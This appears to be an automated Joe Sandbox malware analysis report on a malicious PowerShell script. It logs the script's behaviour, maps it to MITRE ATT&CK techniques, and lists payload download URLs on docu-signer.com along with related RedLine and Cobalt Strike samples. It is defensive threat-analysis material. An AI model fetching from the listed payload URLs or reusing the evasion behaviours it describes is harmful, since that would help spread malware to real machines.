Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6485Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3292Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\52821801\updater.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2408Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: powershell.exe, 00000000.00000002.1446816455.000002251E82E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMicrYY3
Source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: updater.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
PowerShell		1
DLL Side-Loading		2
Process Injection		21
Virtualization/Sandbox Evasion		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		2
Process Injection		LSASS Memory2
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SFHgtxFGtB.ps15%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://docu-signer.cox0%Avira URL Cloudsafe
https://docu-signer.co0%Avira URL Cloudsafe
https://docu-signer.com/ap0%Avira URL Cloudsafe
https://docu-signer.com/api/uz0%Avira URL Cloudsafe
https://docu-signer.com/api0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/upda0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/updater.bin0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912(0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/091254510%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/log4c(0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/log4cxx.dll0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/09120%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/log4cxx.d00%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/updater.bin)0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/updater.0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/l80%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0910%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/log4c0%Avira URL Cloudsafe
http://docu-signer.com0%Avira URL Cloudsafe
https://docu-signer.com0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/09125450%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/l0%Avira URL Cloudsafe
https://docu-signer.com/api/uz/0912545164/log4cxx.dH0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
docu-signer.com
104.21.87.65
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://docu-signer.com/api/uz/0912545164/updater.binfalse
    • Avira URL Cloud: safe
    		unknown
    https://docu-signer.com/api/uz/0912545164/log4cxx.dllfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.autoitscript.com/autoit3/Jupdater.exe.0.drfalse
      		high
      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1440811136.00000225167EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://docu-signer.com/api/uz/0912545164/powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://docu-signer.com/api/uz/09125451powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://docu-signer.com/api/uz/0912(powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://docu-signer.com/api/uz/0912545164/updapowershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://go.micropowershell.exe, 00000000.00000002.1417937766.00000225077FD000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://docu-signer.com/appowershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://docu-signer.com/apipowershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Iconpowershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://docu-signer.copowershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://docu-signer.coxpowershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://docu-signer.com/api/uzpowershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://docu-signer.com/api/uz/0912545164/log4c(powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://docu-signer.com/api/uz/0912545164/log4cxx.d0powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://docu-signer.com/api/uz/0912powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://docu-signer.com/api/uz/powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://docu-signer.com/api/uz/0912545164/l8powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://docu-signer.com/api/uz/0912545164/updater.bin)powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://docu-signer.com/api/uz/0912545164/updater.powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://docu-signer.com/api/uz/091powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1440811136.00000225167EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://docu-signer.com/api/uz/0912545164/log4cpowershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aka.ms/pscore68powershell.exe, 00000000.00000002.1417937766.00000225064F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://docu-signer.compowershell.exe, 00000000.00000002.1417937766.00000225073C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.0000022507151000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://docu-signer.compowershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.0000022507392000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.000002250707E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1417937766.00000225064F1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://docu-signer.com/api/uz/0912545powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docu-signer.com/api/uz/0912545164/lpowershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docu-signer.com/api/uz/0912545164/log4cxx.dHpowershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            104.21.87.65
                            		docu-signer.comUnited States
                            		13335CLOUDFLARENETUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1576522
                            Start date and time:2024-12-17 08:23:35 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 25s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:13
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:SFHgtxFGtB.ps1
                            Detection:MAL
                            Classification:mal48.winPS1@3/7@1/1
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 1
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .ps1

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target powershell.exe, PID 4548 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: SFHgtxFGtB.ps1

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            02:24:32API Interceptor43x Sleep call for process: powershell.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.21.87.65fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              docu-signer.comfsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                              • 104.21.87.65

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUSDG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                              • 104.21.56.70
                              he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                              • 104.21.56.70
                              fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                              • 104.21.87.65
                              1iC0WTxgUf.exeGet hashmaliciousUnknownBrowse
                              • 104.18.0.75
                              Instruction_695-18112-002_Rev.PDF.lnk.d.lnkGet hashmaliciousUnknownBrowse
                              • 104.21.83.229
                              https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637Get hashmaliciousUnknownBrowse
                              • 104.17.25.14
                              seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                              • 104.21.84.67
                              sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                              • 172.67.187.200
                              createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                              • 104.21.84.67
                              ppc.elfGet hashmaliciousMirai, MoobotBrowse
                              • 172.65.156.157

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0eNueva orden de compra-836528268278278.xlsx.exeGet hashmaliciousUnknownBrowse
                              • 104.21.87.65
                              fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                              • 104.21.87.65
                              seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                              • 104.21.87.65
                              sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                              • 104.21.87.65
                              createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                              • 104.21.87.65
                              PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                              • 104.21.87.65
                              drivers.exeGet hashmaliciousUnknownBrowse
                              • 104.21.87.65
                              GameBoxMini.exeGet hashmaliciousUnknownBrowse
                              • 104.21.87.65
                              drivers.exeGet hashmaliciousUnknownBrowse
                              • 104.21.87.65
                              Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                              • 104.21.87.65

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1628158735648508
                              Encrypted:false
                              SSDEEP:3:Nllluldhz/lL:NllU
                              MD5:03744CE5681CB7F5E53A02F19FA22067
                              SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                              SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                              SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:@...e.................................L..............@..........

